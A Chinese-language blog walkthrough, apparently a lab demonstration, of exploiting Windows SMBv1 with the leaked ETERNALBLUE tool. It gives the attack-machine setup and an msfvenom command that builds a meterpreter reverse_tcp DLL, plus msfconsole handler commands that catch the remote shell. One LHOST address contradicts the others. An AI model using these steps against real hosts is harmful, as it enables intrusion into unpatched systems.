一、漏洞说明
漏洞更新时间为2017/04/17,本文将演示方程式 0day ETERNALBLUE 的利用过程,ETERNALBLUE 通过tcp端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,范围非常广泛。
二、影响的版本
windows7
windows 2008 server
windows 2012
三、系统环境
攻击机1:192.168.11.119
攻击机上面需要安装以下环境:
Windows7 64bit 专业版
python-2.6.6.msi
python下载地址:https://www.python.org/download/releases/2.6.6/
pywin32-221.win32-py2.6.exe
pywin32-221下载地址:
https://sourceforge.net/projects/pywin32/files/pywin32/Build%20221/
攻击机2:192.168.11.114
kali 2017.1,需要用到msf
TIM图片20180207113744.png
靶机:192.168.11.103
win7 64SP1 专业版
关闭系统防火墙
QQ图片20180207114014.jpg
四、攻击环境搭建
漏洞利用脚本
https://github.com/misterch0c/shadowbroker
下载解压 切换到windows目录执行fb.py
image.png
看fb.py发现是遍历目录的时候出错了,发现缺少listeningposts目录 创建一个listeningposts目录
再次运行fb.py创建一个攻击项目,设置如下:
目标主机的IP:192.168.11.103
攻击机地址:192.168.11.119
image.png
image.png
image.png
image.png
image.png
image.png
这里要选择SMB和 对应的目标操作系统位数 下面的话是攻击的4个操作 选择RunDLL
image.png这里用攻击机2 kali的msfvenom 生成一下dll 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.108.114 LPORT=4444 -f dll > s.dll
TIM图片20180207160305.png
把生成的s.dll传到攻击机1上
image.png开启msfconsole 下面的payload要和上面msfvenom的payload对应起来
msfconsole
msf > use exploit/multi/handler
msf > set LHOST 192.168.11.114
msf > set LPORT 4444
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit
TIM图片20180207160611.png
接着切到攻击机1操作fb.py
TIM图片20180207161707.png
image.png
成功之后坐等shell上线
image.png
这个漏洞对windoes 2008 server版的机器也生效,已经测试过了。
网友评论